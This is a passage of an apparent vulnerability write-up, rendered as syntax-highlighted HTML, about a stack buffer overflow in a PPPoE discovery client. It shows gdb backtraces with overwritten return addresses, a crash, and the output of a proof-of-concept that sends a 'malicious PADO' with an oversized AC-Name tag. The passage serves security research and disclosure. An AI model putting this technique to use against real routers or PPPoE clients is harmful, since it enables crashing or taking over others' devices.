class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">sprintf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;sysevent set wan_pppoe_acname %.*s&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc7180932209-13\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc7180932209-14\"><span class=\"crayon-p\">#0&nbsp;&nbsp;parsePADOTags (type=&lt;optimized out&gt;, len=1400, data=0x7fffffffdedc &#8216;A&#8217; &lt;repeats 200 times&gt;&#8230;, extra=0x7fffffffde10) at discovery.c:126<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc7180932209-15\"><span class=\"crayon-p\">#1&nbsp;&nbsp;0x0000000000402899 in parsePacket (packet=0x7fffffffdeb0, func=0x401340 &lt;parsePADOTags&gt;, extra=0x7fffffffde10) at common.c:82<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc7180932209-16\"><span class=\"crayon-p\">#2&nbsp;&nbsp;0x0000000000401d3b in waitForPADO (conn=0x605010, timeout=2147482226, timeout@entry=5) at discovery.c:388<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc7180932209-17\"><span class=\"crayon-p\">#3&nbsp;&nbsp;0x00000000004023c0 in discovery (conn=conn@entry=0x605010) at discovery.c:629<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc7180932209-18\"><span class=\"crayon-p\">#4&nbsp;&nbsp;0x00000000004010d4 in main (argc=8, argv=0x7fffffffe5f8) at pppoe-discovery.c:83<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0035 seconds] -->  <\/p>\n<p>The stack is looking sane so far, lets step over the sprintf:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7ccb612016491\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> (gdb) n  127             system(cmd);  (gdb) bt  #0  parsePADOTags (type=&lt;optimized out&gt;, len=1400, data=0x7fffffffdedc &#8216;A&#8217; &lt;repeats 200 times&gt;&#8230;, extra=0x7fffffffde10) at discovery.c:127  #1  0x4141414141414141 in ?? ()  #2  0x4141414141414141 in ?? ()  #3  0x4141414141414141 in ?? ()  #4  0x4141414141414141 in ?? ()  #5  0x4141414141414141 in ?? ()  #6  0x4141414141414141 in ?? ()  #7  0x4141414141414141 in ?? ()  #8  0x4141414141414141 in ?? ()  #9  0x4141414141414141 in ?? ()  #10 0x4141414141414141 in ?? ()  #11 0x4141414141414141 in ?? ()  #12 0x0000414141414141 in ?? ()  #13 0x000005a800000010 in ?? ()  #14 0x0000000000000004 in ?? ()  #15 0x00000000000f310d in ?? ()  #16 0x0000000000605010 in ?? ()  #17 0x0000000100000001 in ?? ()  #18 0x0000000100000001 in ?? ()  #19 0x00000000004034a6 in ?? ()  #20 0x0000000000000010 in ?? ()  #21 0x0000000000000000 in ?? ()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7ccb612016491-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7ccb612016491-25\">25<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-1\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">n<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-2\"><span class=\"crayon-cn\">127<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-3\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-4\"><span class=\"crayon-p\">#0&nbsp;&nbsp;parsePADOTags (type=&lt;optimized out&gt;, len=1400, data=0x7fffffffdedc &#8216;A&#8217; &lt;repeats 200 times&gt;&#8230;, extra=0x7fffffffde10) at discovery.c:127<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-5\"><span class=\"crayon-p\">#1&nbsp;&nbsp;0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-6\"><span class=\"crayon-p\">#2&nbsp;&nbsp;0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-7\"><span class=\"crayon-p\">#3&nbsp;&nbsp;0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-8\"><span class=\"crayon-p\">#4&nbsp;&nbsp;0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-9\"><span class=\"crayon-p\">#5&nbsp;&nbsp;0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-10\"><span class=\"crayon-p\">#6&nbsp;&nbsp;0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-11\"><span class=\"crayon-p\">#7&nbsp;&nbsp;0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-12\"><span class=\"crayon-p\">#8&nbsp;&nbsp;0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-13\"><span class=\"crayon-p\">#9&nbsp;&nbsp;0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-14\"><span class=\"crayon-p\">#10 0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-15\"><span class=\"crayon-p\">#11 0x4141414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-16\"><span class=\"crayon-p\">#12 0x0000414141414141 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-17\"><span class=\"crayon-p\">#13 0x000005a800000010 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-18\"><span class=\"crayon-p\">#14 0x0000000000000004 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-19\"><span class=\"crayon-p\">#15 0x00000000000f310d in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-20\"><span class=\"crayon-p\">#16 0x0000000000605010 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-21\"><span class=\"crayon-p\">#17 0x0000000100000001 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-22\"><span class=\"crayon-p\">#18 0x0000000100000001 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-23\"><span class=\"crayon-p\">#19 0x00000000004034a6 in ?? ()<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7ccb612016491-24\"><span class=\"crayon-p\">#20 0x0000000000000010 in ?? ()<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7ccb612016491-25\"><span class=\"crayon-p\">#21 0x0000000000000000 in ?? ()<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p>Because we changed the stack, we overwrite the return ptrs.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cce659280896\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> (gdb) c  Continuing.  sh: 1: sysevent: not found      Program received signal SIGSEGV, Segmentation fault.  0x00000000004013c1 in parsePADOTags (type=&lt;optimized out&gt;, len=&lt;optimized out&gt;, data=&lt;optimized out&gt;, extra=&lt;optimized out&gt;) at discovery.c:209  209     }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cce659280896-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cce659280896-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cce659280896-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cce659280896-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cce659280896-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cce659280896-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cce659280896-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cce659280896-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cce659280896-1\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cce659280896-2\"><span class=\"crayon-v\">Continuing<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cce659280896-3\"><span class=\"crayon-v\">sh<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sysevent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">found<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cce659280896-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cce659280896-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cce659280896-6\"><span class=\"crayon-e\">Program <\/span><span class=\"crayon-e\">received <\/span><span class=\"crayon-e\">signal <\/span><span class=\"crayon-v\">SIGSEGV<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Segmentation <\/span><span class=\"crayon-v\">fault<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cce659280896-7\"><span class=\"crayon-cn\">0x00000000004013c1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">parsePADOTags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">optimized <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">optimized <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">optimized <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">extra<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">optimized <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-v\">discovery<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">209<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cce659280896-8\"><span class=\"crayon-cn\">209<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>Step 3: run poc.py output<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cd0252992039\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8230;  INFO     &#8211; got PPPoED packet, checking if it is a PPPoED PADI  INFO     &#8211; PPPoED PADI detected,  ###[ PPP over Ethernet Discovery ]###    version   = 1L    type      = 1L    code      = PADI    sessionid = 0x0    len       = 15  ###[ PPPoE Tag ]###       tag_type  = Service-Name       tag_len   = 3       tag_value = &#8216;lol&#8217;  ###[ PPPoE Tag ]###          tag_type  = Host-Uniq          tag_len   = 4          tag_value = &#8216;!\\x00x00&#8217;  ###[ PPPoE Tag ]###             tag_type  = End-Of-List             tag_len   = 0             tag_value = &#8221;  ###[ Padding ]###                load      = &#8216;x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00&#8217;  INFO     &#8211; -&gt; PPPoE Tag  INFO     &#8211; -&gt; PPPoE Tag  INFO     &#8211; got host_uniq: &#8216;!\\x00x00&#8217;  INFO     &#8211; -&gt; PPPoE Tag  INFO     &#8211; -&gt; Padding  INFO     &#8211; sending malicious PADO&#8230;  ###[ Ethernet ]###    dst       = 00:0c:29:5a:a5:9b    src       = 00:0c:29:1f:ab:17    type      = 0x8863  ###[ PPP over Ethernet Discovery ]###       version   = 1       type      = 1       code      = PADO       sessionid = 0x0       len       = None  ###[ PPPoE Tag ]###          tag_type  = Service-Name          tag_len   = None          tag_value = &#8216;lol&#8217;  ###[ PPPoE Tag ]###             tag_type  = Host-Uniq             tag_len   = None             tag_value = &#8216;!\\x00x00&#8217;  ###[ PPPoE Tag ]###                tag_type  = AC-Cookie                tag_len   = None                tag_value = &#8216;A&#8217;  ###[ PPPoE Tag ]###                   tag_type  = AC-Name                   tag_len   = None                   tag_value = &#8216;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#8217;  ###[ PPPoE Tag ]###                      tag_type  = End-Of-List                      tag_len   = None                      tag_value = &#8221;  .  Sent 1 packets.  INFO     &#8211; hooray, malicious PADO sent! :) check your target!  False  INFO     &#8211; got PPPoED packet, checking if it is a PPPoED PADI<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cd0252992039-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cd0252992039-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" 